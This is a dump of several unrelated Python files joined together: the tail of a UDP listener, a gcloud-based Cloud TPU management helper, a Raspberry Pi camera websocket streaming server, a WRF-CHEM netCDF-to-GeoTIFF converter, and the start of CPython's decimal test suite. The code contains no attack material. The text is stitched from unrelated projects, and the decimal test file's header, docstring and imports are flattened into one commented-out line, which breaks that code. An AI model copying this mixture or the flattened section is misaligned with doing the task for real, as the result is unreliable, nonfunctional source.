            # bytes (required on Python 3; identical to str on Python 2).
            stopSocket.sendto(self._STOP_SENTINEL, ('127.0.0.1', self._port))
        finally:
            stopSocket.close()  # previously leaked

    def _startListener(self):
        """Thread body: receive datagrams and print '<ip>: <message>'."""
        listenerSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            # Bind on all interfaces so both broadcast and loopback arrive.
            listenerSocket.bind(('', self._port))
            while not self._haltFlag:
                data, sender = listenerSocket.recvfrom(1024)
                if self._haltFlag:
                    # Sentinel (or late datagram) after StopListener(): don't
                    # print it as if it were a real message.
                    break
                ipAddress = sender[0]
                # recvfrom() yields bytes on Python 3, str on Python 2.
                message = data.decode('utf-8', 'replace') if isinstance(data, bytes) else data
                # Single-argument print() behaves identically on py2 and py3.
                print(ipAddress + ': ' + message)
        finally:
            listenerSocket.close()  # previously leaked
tpu.py
"""Helpers for tpudiepie: shell out to `gcloud compute tpus` to list,
create, delete and reimage Cloud TPUs, and pretty-print the results in
aligned columns."""
from six.moves import shlex_quote as shellquote
from subprocess import check_output
import json
import re
import ring
import sys
import os
import logging
import threading
import contextlib
from pprint import pprint as pp

logger = logging.getLogger('tpudiepie')
# create console handler and set level to debug
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
# create formatter
formatter = logging.Formatter('%(asctime)s|%(levelname)s|%(message)s', datefmt='%m-%d-%Y %I:%M:%S%p %Z')
ch.setFormatter(formatter)
logger.addHandler(ch)

def ero(x):
    """Log *x* at INFO level and return it unchanged (tracing passthrough)."""
    logger.info('%s', x)
    return x

def build_opt(k, v):
    """Render one keyword argument as a gcloud command-line flag.

    True -> '--flag', False -> '--no-flag', anything else -> '--flag value'
    (value shell-quoted).  Single underscores become dashes; a double
    underscore survives as a single underscore in the flag name.
    """
    k = k.replace('_', '-').replace('--', '_')
    if v is True:
        return '--' + k
    if v is False:
        return '--no-' + k
    return '--{} {}'.format(k, shellquote(v))

def build_commandline(cmd, *args, **kws):
    """Join *cmd*, quoted positional args and flag-rendered kwargs into one
    shell command string.  kwargs whose value is None are omitted."""
    return ' '.join([cmd] + [shellquote(x) for x in args] + [build_opt(k, v) for k, v in kws.items() if v is not None])

def system(cmd, *args, **kws):
    """Build a command line and run it via os.system (output not captured)."""
    command = build_commandline(cmd, *args, **kws)
    os.system(command)

def run(cmd, *args, **kws):
    """Build a command line, log it, run it in a shell, and return stdout."""
    command = build_commandline(cmd, *args, **kws)
    out = check_output(ero(command), shell=True)
    return out

# The parse_tpu_* helpers below accept either a fully-qualified TPU name
# string ('projects/<p>/locations/<z>/nodes/<id>') or the gcloud JSON dict.

def parse_tpu_project(tpu):
    """Extract the GCP project id from a TPU's fully-qualified name."""
    fqn = tpu if isinstance(tpu, str) else tpu['name']
    return fqn.split('/')[-5]

def parse_tpu_zone(tpu):
    """Extract the zone from a TPU's fully-qualified name."""
    fqn = tpu if isinstance(tpu, str) else tpu['name']
    return fqn.split('/')[-3]

def parse_tpu_id(tpu):
    """Extract the short node id (last path component) from a TPU name."""
    fqn = tpu if isinstance(tpu, str) else tpu['name']
    return fqn.split('/')[-1]

def parse_tpu_index(tpu):
    """Return the trailing numeric suffix of the TPU name, or -1 if none."""
    fqn = tpu if isinstance(tpu, str) else tpu['name']
    idx = re.findall(r'([0-9]+)$', fqn)
    if len(idx) <= 0:
        idx = -1
    else:
        idx = int(idx[0])
    return idx

def parse_tpu_network(tpu):
    """Extract the network's short name from a TPU dict or network path."""
    net = tpu if isinstance(tpu, str) else tpu['network']
    return net.split('/')[-1]

@ring.lru(expire=3600) # cache tpu zones for an hour
def get_tpu_zones():
    """Return all zone ids that offer TPUs, via `gcloud ... locations list`."""
    out = run("gcloud compute tpus locations list", format="json")
    zones = json.loads(out)
    return [zone['locationId'] for zone in zones]

class nullcontext(contextlib.AbstractContextManager):
    """Context manager that does no additional processing.

    Used as a stand-in for a normal context manager, when a particular
    block of code is only sometimes used with a normal context manager:

    cm = optional_cm if condition else nullcontext()
    with cm:
        # Perform operation, using optional_cm if condition is True
    """
    def __init__(self, enter_result=None):
        self.enter_result = enter_result
    def __enter__(self):
        return self.enter_result
    def __exit__(self, *excinfo):
        pass

def click_context():
    """Return the current click context, or a nullcontext() fallback.

    Used so worker threads can re-enter the CLI's context when the module
    is driven by click, while remaining usable without click installed.
    """
    try:
        import click
        ctx = click.get_current_context(silent=True)
    # NOTE(review): bare except presumably guards against click being
    # uninstalled, but it also hides unexpected errors — consider
    # narrowing to ImportError.
    except:
        ctx = None
    if ctx is None:
        ctx = nullcontext()
    return ctx

@ring.lru(expire=15) # cache tpu info for 15 seconds
def fetch_tpus(zone=None):
    """List TPUs across zones, one listing thread per zone.

    zone: None (all zones) or a comma-separated zone string.
    NOTE(review): if zone is neither None nor a str, `zones` is unbound
    and this raises — callers appear to only pass None or strings.
    """
    if zone is None:
        zones = get_tpu_zones()
    if isinstance(zone, str):
        zones = zone.split(',')
    tpus = []
    ctx = click_context()
    def fetch(zone):
        # Run each per-zone listing inside the CLI context (or a no-op one).
        with ctx:
            more = list_tpus(zone)
            tpus.extend(more)
    threads = [threading.Thread(target=fetch, args=(zone,), daemon=True) for zone in zones]
    for thread in threads:
        thread.start()
    for thread in threads:
        thread.join()
    return tpus

def list_tpus(zone):
    """Return the TPUs in *zone*, sorted by their numeric name suffix."""
    out = run("gcloud compute tpus list", format="json", zone=zone)
    tpus = json.loads(out)
    return list(sorted(tpus, key=parse_tpu_index))

def get_tpus(zone=None):
    """Return (possibly cached) TPUs, filtered to *zone* when given."""
    tpus = fetch_tpus(zone=zone)
    if zone is None:
        return tpus
    else:
        # The zone appears as a path component of the fully-qualified name.
        return [tpu for tpu in tpus if '/{}/'.format(zone) in tpu['name']]

def get_tpu(tpu, zone=None, silent=False):
    """Resolve *tpu* (dict, id string, or numeric index) to a single TPU dict.

    Raises ValueError on ambiguous or missing matches; returns None for a
    missing match when silent=True.
    """
    if isinstance(tpu, dict):
        tpu = parse_tpu_id(tpu)
    if isinstance(tpu, str) and re.match('^[0-9]+$', tpu):
        tpu = int(tpu)
    if isinstance(tpu, int):
        which = 'index'
        tpus = [x for x in get_tpus(zone=zone) if parse_tpu_index(x) == tpu]
    else:
        which = 'id'
        tpus = [x for x in get_tpus(zone=zone) if parse_tpu_id(x) == tpu]
    if len(tpus) > 1:
        raise ValueError("Multiple TPUs matched {} {!r}. Try specifying --zone".format(which, tpu))
    if len(tpus) <= 0:
        if silent:
            return None
        raise ValueError("No TPUs matched {} {!r}".format(which, tpu))
    return tpus[0]

from string import Formatter

class NamespaceFormatter(Formatter):
    """string.Formatter that falls back to a namespace dict for field names
    not supplied as keyword arguments."""
    def __init__(self, namespace={}):
        Formatter.__init__(self)
        self.namespace = namespace
    def get_value(self, key, args, kwds):
        if isinstance(key, str):
            try:
                # Check explicitly passed arguments first
                return kwds[key]
            except KeyError:
                return self.namespace[key]
        else:
            return Formatter.get_value(key, args, kwds)

from collections import defaultdict

@ring.lru(expire=1) # seconds
def format_widths():
    """Compute per-column display widths ('<field>_w') wide enough for both
    the header text and every TPU's value, plus one space of padding."""
    headers = format_headers()
    tpus = get_tpus()
    r = defaultdict(int)
    for tpu in tpus:
        args = _format_args(tpu)
        for k, v in args.items():
            s = '{}'.format(v)
            r[k+'_w'] = max(r[k+'_w'], len(s) + 1, len(headers[k]) + 1)
    return r

def _normalize_tpu_isodate(iso):
    """Trim sub-microsecond digits from a TPU ISO timestamp so it matches
    the '%...%fZ' parse format; raise ValueError if it doesn't look right."""
    r = re.findall('(.*[.][0-9]{6})[0-9]*Z', iso)
    if len(r) > 0:
        return r[0] + 'Z'
    raise ValueError("Could not parse TPU date {!r}".format(iso))

import moment
import datetime
import time

def get_timestamp(timestamp=None, utc=True):
    """Format a unix timestamp (default: now) in the local timezone."""
    if timestamp is None:
        timestamp = time.time()
    # https://stackoverflow.com/a/52606421/9919772
    #dt = datetime.datetime.fromtimestamp(timestamp).astimezone()
    dt = moment.unix(timestamp, utc=utc)
    dt = dt.timezone(current_tzname())
    return dt.strftime("%m-%d-%Y %I:%M:%S%p %Z")

def current_timezone():
    """Return the host's current timezone, honouring daylight saving."""
    if time.daylight:
        return datetime.timezone(datetime.timedelta(seconds=-time.altzone),time.tzname[1])
    else:
        return datetime.timezone(datetime.timedelta(seconds=-time.timezone),time.tzname[0])

def current_tzname():
    """Name of the host's current timezone (e.g. 'PST')."""
    return current_timezone().tzname(None)

def since(iso):
    """Seconds elapsed since the given TPU ISO timestamp (UTC)."""
    dt = moment.utcnow() - moment.utc(_normalize_tpu_isodate(iso), "%Y-%m-%dT%H:%M:%S.%fZ")
    return dt.total_seconds()

def minutes_since(iso):
    return since(iso) / 60

def hours_since(iso):
    return since(iso) / 3600

def days_since(iso):
    return since(iso) / 86400

def nice_since(iso):
    """Render elapsed time as fixed-width 'DDdHHhMMm', blank-padding the
    leading units that are zero (seconds are intentionally dropped)."""
    t = int(since(iso))
    s = t % 60
    m = (t // 60) % 60
    h = (t // 3600) % 24
    d = (t // 86400)
    r = []
    out = False
    if d > 0 or out:
        out = True
        r += ['{:02d}d'.format(d)]
    else:
        r += ['   ']
    if h > 0 or out:
        out = True
        r += ['{:02d}h'.format(h)]
    else:
        r += ['   ']
    if m > 0 or out:
        out = True
        r += ['{:02d}m'.format(m)]
    else:
        r += ['   ']
    # if s > 0 or out:
    #   out = True
    #   r += ['{:02d}s'.format(s)]
    return ''.join(r)

def format_headers():
    """Column header labels, keyed by the same names as _format_args()."""
    return {
        'kind': 'header',
        'project': 'PROJECT',
        'zone': 'ZONE',
        'id': 'ID',
        'fqn': 'FQN',
        'ip': 'IP',
        'port': 'PORT',
        'master': 'MASTER',
        'range': 'RANGE',
        'type': 'TYPE',
        'created': 'CREATED',
        'age': 'AGE',
        'preemptible': 'PREEMPTIBLE?',
        'status': 'STATUS',
        'health': 'HEALTH',
        'index': 'INDEX',
        'version': 'VERSION',
        'network': 'NETWORK',
    }

def _format_args(tpu):
    """Flatten one TPU JSON dict into the displayable fields."""
    return {
        'kind': 'tpu',
        'project': parse_tpu_project(tpu),
        'zone': parse_tpu_zone(tpu),
        'id': parse_tpu_id(tpu),
        'fqn': tpu['name'],
        'ip': parse_tpu_ip(tpu),
        'port': tpu['port'],
        'master': parse_tpu_master(tpu),
        'range': parse_tpu_range(tpu),
        'type': parse_tpu_type(tpu),
        'created': tpu['createTime'],
        'age': nice_since(tpu['createTime']),
        'preemptible': 'yes' if parse_tpu_preemptible(tpu) else 'no',
        'status': tpu['state'],
        'health': tpu.get('health', 'UNKNOWN'),
        'index': parse_tpu_index(tpu),
        'version': parse_tpu_version(tpu),
        'network': parse_tpu_network(tpu),
    }

def parse_tpu_preemptible(tpu):
    """True if the TPU was created with the preemptible scheduling flag."""
    return tpu.get('schedulingConfig', {'preemptible': False}).get('preemptible', False)

def parse_tpu_ip(tpu):
    """TPU's IP address, or '' if not (yet) assigned."""
    return tpu.get('ipAddress', '')

def parse_tpu_master(tpu):
    """'ip:port' master address (default TPU gRPC port 8470)."""
    return '{}:{}'.format(tpu.get('ipAddress',''), tpu.get('port', 8470))

def parse_tpu_range(tpu):
    """TPU's CIDR block."""
    return tpu['cidrBlock']

def parse_tpu_version(tpu):
    """TensorFlow version the TPU was created with."""
    return tpu['tensorflowVersion']

def parse_tpu_type(tpu):
    """Accelerator type, e.g. 'v3-8'."""
    return tpu['acceleratorType']

def parse_tpu_description(tpu):
    """Free-form description, or None."""
    return tpu.get('description', None)

def format_args(tpu):
    """Displayable fields plus the shared column widths, for one TPU."""
    r = _format_args(tpu)
    r.update(format_widths())
    return r

def get_default_format_specs(thin=False):
    """Per-column format specs; thin=True strips the width alignment."""
    specs = [
        "{zone:{zone_w}}",
        "{index:<{index_w}}",
        "{type:{type_w}}",
        "{age:{age_w}}",
        "{id:{id_w}}",
        "{status:{status_w}}",
        "{health:{health_w}}",
        "{version:{version_w}}",
        "{network:{network_w}}",
        "{master:{master_w}}",
        "{range:{range_w}}",
        "{preemptible!s:{preemptible_w}}",
    ]
    if thin:
        # Keep only the field name from each "{name:{name_w}}" spec.
        return ['{' + re.findall('{([^:]+)[:]', x)[0] + '}' for x in specs]
    else:
        return specs

def get_default_format_spec(thin=False):
    """The full row format string (all columns, space-separated)."""
    return ' '.join(get_default_format_specs(thin=thin))

def format(tpu, spec=None, formatter=NamespaceFormatter):
    """Format one TPU (or a pre-built header dict) as an aligned row.

    NOTE(review): shadows the builtin `format`; callers in this module
    rely on the name, so it is kept.
    """
    if tpu.get('kind', 'tpu') == 'tpu':
        args = format_args(tpu)
    else:
        # A synthetic row (e.g. the header): use its fields directly,
        # supplemented with the shared column widths.
        args = {}
        args.update(tpu)
        args.update(format_widths())
    fmt = formatter(args)
    if spec is None:
        spec = get_default_format_spec(thin=len(format_widths()) == 0)
    return fmt.format(spec)

def create_tpu_command(tpu, zone=None, version=None, description=None, preemptible=None):
    """Build (but do not run) the gcloud command that would recreate *tpu*,
    defaulting every unspecified option to the existing TPU's settings."""
    if zone is None:
        zone = parse_tpu_zone(tpu)
    if version is None:
        version = parse_tpu_version(tpu)
    if description is None:
        description = parse_tpu_description(tpu)
    if preemptible is None:
        # None (rather than False) omits the flag entirely.
        preemptible = True if parse_tpu_preemptible(tpu) else None
    return build_commandline("gcloud compute tpus create",
                             parse_tpu_id(tpu),
                             zone=zone,
                             network=parse_tpu_network(tpu),
                             range=parse_tpu_range(tpu),
                             version=version,
                             accelerator_type=parse_tpu_type(tpu),
                             preemptible=preemptible,
                             description=description,
                             )

def delete_tpu_command(tpu, zone=None):
    """Build (but do not run) the gcloud command that deletes *tpu*."""
    if zone is None:
        zone = parse_tpu_zone(tpu)
    return build_commandline("gcloud compute tpus delete",
                             parse_tpu_id(tpu),
                             zone=zone,
                             quiet=True,
                             )

def reimage_tpu_command(tpu, version=None):
    """Build (but do not run) the gcloud command that reimages *tpu*."""
    if version is None:
        version = parse_tpu_version(tpu)
    return build_commandline("gcloud compute tpus reimage",
                             parse_tpu_id(tpu),
                             zone=parse_tpu_zone(tpu),
                             version=version,
                             quiet=True,
                             )
server.py
#!/usr/bin/env python
"""Live-stream the Raspberry Pi camera to browsers as MPEG1 over websockets.

Pipeline: picamera YUV frames -> avconv subprocess (raw video in,
mpeg1video out) -> BroadcastThread -> every connected ws4py websocket
client, decoded in the browser by jsmpg.js.  A small HTTP server on
HTTP_PORT serves index.html and jsmpg.js; the stream runs on WS_PORT.
"""

import sys
import io
import os
import shutil
from subprocess import Popen, PIPE
from string import Template
from struct import Struct
from threading import Thread
from time import sleep, time
from http.server import HTTPServer, BaseHTTPRequestHandler
from wsgiref.simple_server import make_server

import picamera
from ws4py.websocket import WebSocket
from ws4py.server.wsgirefserver import WSGIServer, WebSocketWSGIRequestHandler
from ws4py.server.wsgiutils import WebSocketWSGIApplication

###########################################
# CONFIGURATION
WIDTH = 1280            # capture width (pixels)
HEIGHT = 960            # capture height (pixels)
FRAMERATE = 24          # camera frame rate
HTTP_PORT = 8082        # serves index.html / jsmpg.js
WS_PORT = 8084          # serves the MPEG1 websocket stream
COLOR = u'#444'         # substituted into the page template
BGCOLOR = u'#333'       # substituted into the page template
JSMPEG_MAGIC = b'jsmp'  # magic bytes jsmpg.js expects in the stream header
JSMPEG_HEADER = Struct('>4sHH')  # magic + width + height, big-endian

###########################################


class StreamingHttpHandler(BaseHTTPRequestHandler):
    """Serves the player page and its JS; everything else is a 404."""

    def do_HEAD(self):
        # HEAD is delegated to do_GET; the body write there is guarded on
        # self.command, so only the headers are emitted for HEAD.
        self.do_GET()

    def do_GET(self):
        if self.path == '/':
            self.send_response(301)
            self.send_header('Location', '/index.html')
            self.end_headers()
            return
        elif self.path == '/jsmpg.js':
            content_type = 'application/javascript'
            content = self.server.jsmpg_content
        elif self.path == '/index.html':
            content_type = 'text/html; charset=utf-8'
            tpl = Template(self.server.index_template)
            # Point the page's websocket at this host's WS_PORT.
            content = tpl.safe_substitute(dict(
                ADDRESS='%s:%d' % (self.request.getsockname()[0], WS_PORT),
                WIDTH=WIDTH,
                HEIGHT=HEIGHT,
                COLOR=COLOR,
                BGCOLOR=BGCOLOR))
        else:
            self.send_error(404, 'File not found')
            return
        content = content.encode('utf-8')
        self.send_response(200)
        self.send_header('Content-Type', content_type)
        self.send_header('Content-Length', len(content))
        self.send_header('Last-Modified', self.date_time_string(time()))
        self.end_headers()
        if self.command == 'GET':
            self.wfile.write(content)


class StreamingHttpServer(HTTPServer):
    """HTTPServer that preloads index.html and jsmpg.js at startup."""

    def __init__(self, ):
        super(StreamingHttpServer, self).__init__(
                ('', HTTP_PORT), StreamingHttpHandler)
        with io.open('index.html', 'r') as f:
            self.index_template = f.read()
        with io.open('jsmpg.js', 'r') as f:
            self.jsmpg_content = f.read()


class StreamingWebSocket(WebSocket):
    """Sends the jsmpg stream header as soon as a client connects."""

    def opened(self):
        self.send(JSMPEG_HEADER.pack(JSMPEG_MAGIC, WIDTH, HEIGHT), binary=True)


class BroadcastOutput(object):
    """File-like sink for picamera: pipes raw YUV frames into an avconv
    process that re-encodes them as MPEG1 video on its stdout."""

    def __init__(self, camera):
        print('Spawning background conversion process')
        self.converter = Popen([
            'avconv',
            '-f', 'rawvideo',
            '-pix_fmt', 'yuv420p',
            '-s', '%dx%d' % camera.resolution,
            '-r', str(float(camera.framerate)),
            '-i', '-',
            '-f', 'mpeg1video',
            '-b', '3200k',
            '-r', str(float(camera.framerate)),
            '-'],
            stdin=PIPE, stdout=PIPE, stderr=io.open(os.devnull, 'wb'),
            shell=False, close_fds=True)

    def write(self, b):
        # Called by picamera for each chunk of raw frame data.
        self.converter.stdin.write(b)

    def flush(self):
        # Called by picamera when recording stops.
        print('Waiting for background conversion process to exit')
        self.converter.stdin.close()
        self.converter.wait()


class BroadcastThread(Thread):
    """Reads MPEG1 data from the converter's stdout and broadcasts each
    chunk to every connected websocket client."""

    def __init__(self, converter, websocket_server):
        super(BroadcastThread, self).__init__()
        self.converter = converter
        self.websocket_server = websocket_server

    def run(self):
        try:
            while True:
                buf = self.converter.stdout.read(512)
                if buf:
                    self.websocket_server.manager.broadcast(buf, binary=True)
                elif self.converter.poll() is not None:
                    # No data and the converter exited: stream is over.
                    break
        finally:
            self.converter.stdout.close()


def main():
    """Wire camera, converter, HTTP and websocket servers together and run
    until interrupted, then tear everything down in reverse order."""
    print('Initializing camera')
    with picamera.PiCamera() as camera:
        camera.resolution = (WIDTH, HEIGHT)
        camera.framerate = FRAMERATE
        camera.hflip = True
        camera.vflip = True
        sleep(1)  # camera warm-up time
        print('Initializing websockets server on port %d' % WS_PORT)
        websocket_server = make_server(
            '', WS_PORT,
            server_class=WSGIServer,
            handler_class=WebSocketWSGIRequestHandler,
            app=WebSocketWSGIApplication(handler_cls=StreamingWebSocket))
        websocket_server.initialize_websockets_manager()
        websocket_thread = Thread(target=websocket_server.serve_forever)
        print('Initializing HTTP server on port %d' % HTTP_PORT)
        http_server = StreamingHttpServer()
        http_thread = Thread(target=http_server.serve_forever)
        print('Initializing broadcast thread')
        output = BroadcastOutput(camera)
        broadcast_thread = BroadcastThread(output.converter, websocket_server)
        print('Starting recording')
        camera.start_recording(output, 'yuv')
        try:
            print('Starting websockets thread')
            websocket_thread.start()
            print('Starting HTTP server thread')
            http_thread.start()
            print('Starting broadcast thread')
            broadcast_thread.start()
            while True:
                # Raises if the camera hits an error while recording.
                camera.wait_recording(1)
        except KeyboardInterrupt:
            pass
        finally:
            print('Stopping recording')
            camera.stop_recording()
            print('Waiting for broadcast thread to finish')
            broadcast_thread.join()
            print('Shutting down HTTP server')
            http_server.shutdown()
            print('Shutting down websockets server')
            websocket_server.shutdown()
            print('Waiting for HTTP server thread to finish')
            http_thread.join()
            print('Waiting for websockets thread to finish')
            websocket_thread.join()


if __name__ == '__main__':
    main()
procWRFCHEM.py
#!/usr/bin/env python
"""Convert WRF-CHEM netCDF outputs (SO2 / volcanic ash fields) into
georeferenced GeoTIFFs, one file per timestep, remapped onto a regular
lat/lon grid via the external `bin/remap` tool.  Python 2 script."""
import os, sys, subprocess
import gdal
import multiprocessing
import numpy as np
import time as tt
from netCDF4 import Dataset
from osgeo import osr
from os.path import basename


def extract_product(fileAbsPath, field, pixelSize=0.10):
    """Extract *field* from a WRF-CHEM netCDF file into per-timestep GeoTIFFs.

    fileAbsPath: path to the netCDF input.
    field: variable name ('so2', 'vash_al', or 'vashcol_sat_col').
    pixelSize: output grid resolution in degrees.
    Returns the list of GeoTIFF filenames written.
    """
    ncfile = Dataset(fileAbsPath, 'r')
    data = ncfile.variables[field][:]
    time = ncfile.variables['Times'][:]
    lon = ncfile.variables['XLONG'][:]
    lat = ncfile.variables['XLAT'][:]
    if field != 'vashcol_sat_col':
        # 3-D fields: read geopotential (PH/PHB) and terrain height (HGT)
        # so vertical level heights can be computed per band.
        ph = ncfile.variables['PH'][:]
        phb = ncfile.variables['PHB'][:]
        hgt = ncfile.variables['HGT'][:]
        is_volume = True
    else:
        # Column field is 2-D; insert a singleton band axis so the code
        # below can treat both cases as (time, band, y, x).
        data = np.expand_dims(data, axis=1)
        is_volume = False
    ncfile.close()
    xSize = data.shape[3]
    ySize = data.shape[2]
    numBands = data.shape[1]
    driver = gdal.GetDriverByName('GTiff')
    no_data = -9999
    if field == 'vashcol_sat_col' or field == 'vash_al':
        field = 'EYJA_' + field
    field = field.upper()
    # Timestamp slice of the input filename, used in the output names.
    dateStr = basename(fileAbsPath)[11:21]
    # Write the curvilinear lat/lon arrays to a 2-band helper raster that
    # the external remap tool uses to build the resampling transform.
    coordsFilename = 'WRF-CHEM_coords_' + field + dateStr + '.tif'
    coord_ds = driver.Create(coordsFilename, xSize, ySize, 2, gdal.GDT_Float32)
    coord_ds.GetRasterBand(1).WriteArray(lat[0])
    coord_ds.GetRasterBand(2).WriteArray(lon[0])
    coord_ds = None
    prefix = 'WRFCHEM_' + field + basename(fileAbsPath)[6:11].upper()
    outFileList = []
    # Geographic bounding box of the model grid.
    upper_left = []
    lower_right = []
    upper_left.append(np.amax(lat[0][:][:]))
    upper_left.append(np.amin(lon[0][:][:]))
    lower_right.append(np.amin(lat[0][:][:]))
    lower_right.append(np.amax(lon[0][:][:]))
    # Seed raster (first timestep/band) fed to the remap tool.
    tmpOutFile = prefix + dateStr + '_tmp.tif'
    dst_ds = driver.Create(tmpOutFile, xSize, ySize, 1, gdal.GDT_Float32)
    dst_ds.GetRasterBand(1).WriteArray(np.squeeze(data[0][0][:][:]))
    dst_ds = None
    workingDir = os.path.dirname(os.path.realpath(__file__)) + '/../'
    # Run the remap tool twice, concurrently: once to produce the valid-data
    # mask, once ('-c') to produce the i/j source-index lookup rasters.
    command_call = [workingDir + 'bin/remap', '-i', tmpOutFile,
                    '-l', str(upper_left[0]), str(upper_left[1]),
                    '-e', str(lower_right[0]), str(lower_right[1]),
                    '-a', coordsFilename, '-s', str(pixelSize),
                    '-n', str(no_data), '-q', '-o', tmpOutFile + '_mask']
    mask_process = subprocess.Popen(command_call, stdout=open(os.devnull, 'wb'))
    command_call.pop()
    command_call.append(tmpOutFile + '_remapped')
    command_call.append('-c')
    coord_process = subprocess.Popen(command_call, stdout=open(os.devnull, 'wb'))
    coord_process.wait()
    mask_process.wait()
    # i/j lookup tables: for each output pixel, which input cell to sample.
    remap_ds = gdal.Open(tmpOutFile + '_remapped', gdal.GA_ReadOnly)
    transform_i = remap_ds.GetRasterBand(1).ReadAsArray().transpose()
    transform_j = remap_ds.GetRasterBand(2).ReadAsArray().transpose()
    mask_ds = gdal.Open(tmpOutFile + '_mask', gdal.GA_ReadOnly)
    mask = mask_ds.GetRasterBand(1).ReadAsArray().transpose()
    for t in range(0, len(time)):
        # Rebuild a compact timestamp (YYYYMMDD.HHMM00) from the netCDF
        # 'Times' character array, dropping separators and the seconds.
        dateStr = ''
        for i in range(0, len(time[t]) - 3):
            if time[t][i] == ':' or time[t][i] == '-' or time[t][i] == '_':
                continue
            dateStr += time[t][i]
        dateStr += '00'
        dateStr = dateStr[:8] + '.' + dateStr[8:]
        outFilename = prefix + dateStr + '.tif'
        dst_ds = driver.Create(outFilename, transform_j.shape[0],
                               transform_j.shape[1], numBands, gdal.GDT_Float32)
        height = np.zeros([numBands, ySize, xSize])
        heightLevels = []
        for l in range(numBands):
            outData = np.ones([transform_j.shape[0], transform_j.shape[1]]) * no_data
            if is_volume:
                # Level height above terrain from geopotential / g.
                height[l][:][:] = ((ph[t][l][:][:] + phb[t][l][:][:]) / 9.81) - hgt[t][:][:]
                avg = np.average(height[l][:][:])
                if avg < 0:
                    avg = 0
                heightLevels.append(avg)
            # Sample the input field through the i/j lookup tables.
            for i in range(outData.shape[0]):
                for j in range(outData.shape[1]):
                    outData[i, j] = data[t, l, transform_j[i,j], transform_i[i,j]]
            outData[mask==no_data] = no_data
            # Bands are written top-down (numBands - l).
            dst_ds.GetRasterBand(numBands - l).SetNoDataValue(no_data)
            dst_ds.GetRasterBand(numBands - l).WriteArray(outData.transpose())
            dst_ds.GetRasterBand(numBands - l).ComputeStatistics(False)
        # North-up geotransform in WGS84 at the requested resolution.
        dst_ds.SetGeoTransform([upper_left[1], pixelSize, 0, upper_left[0], 0, -pixelSize])
        srs = osr.SpatialReference()
        srs.SetWellKnownGeogCS('WGS84')
        dst_ds.SetProjection(srs.ExportToWkt())
        # Global (all-timestep) extrema, for consistent colour scaling.
        dst_ds.SetMetadataItem('GLOBAL_MAX', str(np.max(data)))
        dst_ds.SetMetadataItem('GLOBAL_MIN', str(np.min(data)))
        date = dateStr[0:4] + '-' + dateStr[4:6] + '-' + dateStr[6:8]
        hours = dateStr[9:11]
        minutes = dateStr[11:13]
        seconds = '00'
        formatedDate = date + 'T' + hours + ':' + minutes + ':' + seconds + 'Z'
        dst_ds.SetMetadataItem('TIME_END', formatedDate)
        dst_ds.SetMetadataItem('TIME_START', formatedDate)
        if is_volume:
            dst_ds.SetMetadataItem('VERTICAL_LEVELS_NUMBER', str(len(heightLevels)))
            # '[a, b]' -> 'a,b'
            dst_ds.SetMetadataItem('VERTICAL_LEVELS', str(heightLevels).replace(' ', '')[1:-1])
        dst_ds = None
        outFileList.append(outFilename)
    # Clean up the helper rasters.
    os.remove(coordsFilename)
    os.remove(tmpOutFile)
    os.remove(tmpOutFile + '_remapped')
    os.remove(tmpOutFile + '_mask')
    return outFileList


def createImgWRFCHEM_SO2(fileAbsPath):
    """Extract the SO2 concentration product."""
    return extract_product(fileAbsPath, 'so2')


def createImgWRFCHEM_ASH3D(fileAbsPath):
    """Extract the 3-D volcanic ash product."""
    return extract_product(fileAbsPath, 'vash_al')


def createImgWRFCHEM_ASHCOL(fileAbsPath):
    """Extract the ash column (2-D) product."""
    return extract_product(fileAbsPath, 'vashcol_sat_col')


if __name__ == '__main__':
    if len(sys.argv) < 2:
        sys.exit('\nUsage: %s WRF-CHEM_file(s) \n' % sys.argv[0])
    files = sys.argv[1:]
    fields = ['vash_al', 'vashcol_sat_col', 'so2']
    #number of concurrent processes, it's 3 in order to avoid running out of memory
    active_processes = 3
    active_jobs = []
    joblist = []
    # Build one job per input file; the field is inferred from the filename
    # suffix emitted by the WRF-CHEM post-processor.
    for file in files:
        if not os.path.exists(file):
            print '\nERROR: File %s was not found!\n' % file
            continue
        if file[-6:] == 'vash3d':
            field = 'vash_al'
        elif file[-7:] == 'vashcol':
            field = 'vashcol_sat_col'
        else:
            field = 'so2'
        p = multiprocessing.Process(target=extract_product, args=(file, field))
        joblist.append((p, file, tt.time()))
    # Simple scheduler: keep up to active_processes jobs running, reaping
    # finished ones, until both queues drain.
    # NOTE(review): both loops mutate the list they iterate, which skips the
    # element after each removal; it still terminates because the outer
    # while re-scans every 0.5s, but at most one job is started/reaped per
    # pass — consider iterating over a copy.
    while joblist or active_jobs:
        for job in joblist:
            if len(active_jobs) < active_processes:
                job[0].start()
                joblist.remove(job)
                active_jobs.append(job)
                continue
        for job in active_jobs:
            if not job[0].is_alive():
                print 'Finished processing for {0}, took: {1:5.1f}s'.format(job[1], tt.time()-job[2])
                active_jobs.remove(job)
                continue
        tt.sleep(0.5)
    exit(0)
test_decimal.py
# Copyright (c) 2004 Python Software Foundation. # All rights reserved. # Written by Eric Price <eprice at tjhsst.edu> # and Facundo Batista <facundo at taniquetil.com.ar> # and Raymond Hettinger <python at rcn.com> # and Aahz (aahz at pobox.com) # and Tim Peters """ These are the test cases for the Decimal module. There are two groups of tests, Arithmetic and Behaviour. The former test the Decimal arithmetic using the tests provided by Mike Cowlishaw. The latter test the pythonic behaviour according to PEP 327. Cowlishaw's tests can be downloaded from: http://speleotrove.com/decimal/dectest.zip This test module can be called from command line with one parameter (Arithmetic or Behaviour) to test each part, or without parameter to test both parts. If you're working through IDLE, you can import this test module and call test_main() with the corresponding argument. """ import math import os, sys import operator import warnings import pickle, copy import unittest import numbers import locale from test.support import (run_unittest, run_doctest, is_resource_enabled, requires_IEEE_754, requires_docstrings) from test.support import (TestFailed, run_with_locale, cpython_only) from test.support.import_helper import import_fresh_module import random import inspect import threading C = import_fresh_module('decimal', fresh=['_decimal']) P = import_fresh_module('decimal', blocked=['_decimal']) orig_sys_decimal = sys.modules['decimal'] # fractions module must import the correct decimal module. 
# Build a fractions module bound to each decimal implementation: fractions
# picks up whichever module is installed as sys.modules['decimal'] at the
# time it is (re-)imported, so we swap the entry around each fresh import
# and restore the original module afterwards.
cfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = P
pfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = C
fractions = {C: cfractions, P: pfractions}
sys.modules['decimal'] = orig_sys_decimal

# Useful Test Constant
# All signal (exception) classes per implementation; None for C when the
# _decimal extension build is unavailable.
